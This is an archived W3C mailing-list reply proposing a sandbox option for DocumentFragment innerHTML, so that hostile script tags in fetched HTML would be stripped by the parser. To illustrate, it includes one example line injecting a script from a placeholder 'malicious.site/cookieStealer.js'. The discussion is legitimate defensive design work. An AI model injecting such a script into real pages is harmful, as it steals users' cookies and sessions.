W3C home > Mailing lists > Public > public-webapps@w3.org > October to December 2011

Re: innerHTML in DocumentFragment

From: Ryan Seddon <seddon.ryan@gmail.com>
Date: Tue, 8 Nov 2011 15:23:50 +1100
Message-ID: <CADsa-VeLNtd_vkOvnnhvQqwg7g0BuMAxT7Ne8Kp50gOUP5CXow@mail.gmail.com>
To: Ojan Vafai <ojan@chromium.org>
Cc: Yehuda Katz <wycats@gmail.com>, public-webapps WG <public-webapps@w3.org>
On Tue, Nov 8, 2011 at 4:30 AM, Ojan Vafai <ojan@chromium.org> wrote:

> I don't really follow. Script won't execute until you append the fragment
> to the DOM, at which point the fragment itself doesn't go in the DOM, just
> it's children. So, I'm not really sure what sandboxing on fragments would
> do.


If I was ajaxing in potentially hostile content that had malicious script
tags in it it would be ideal to "sandbox" the content so the HTML parser in
the browser would strip the content for me.

xhr.responseText = "<div><script
src="//malicious.site/cookieStealer.js"></script><h1>content</h1></div>";

var frag =  document.createDocumentFragment();

frag.sandbox = "";
frag.innerHTML = xhr.responseText; // it's sandboxed so the script(s) will
be stripped by the parser.

document.body.appendChild(frag);

The following article demonstrates the same concept using an iframe with
the sandbox attribute set[1]. This to me would also make sense to be
extended to fragments.

[1]
http://community.jboss.org/people/wesleyhales/blog/2011/08/28/fixing-ajax-on-mobile-devices

-Ryan
Received on Tuesday, 8 November 2011 04:24:48 GMT

This archive was generated by hypermail 2.3.1 : Tuesday, 26 March 2013 18:49:48 GMT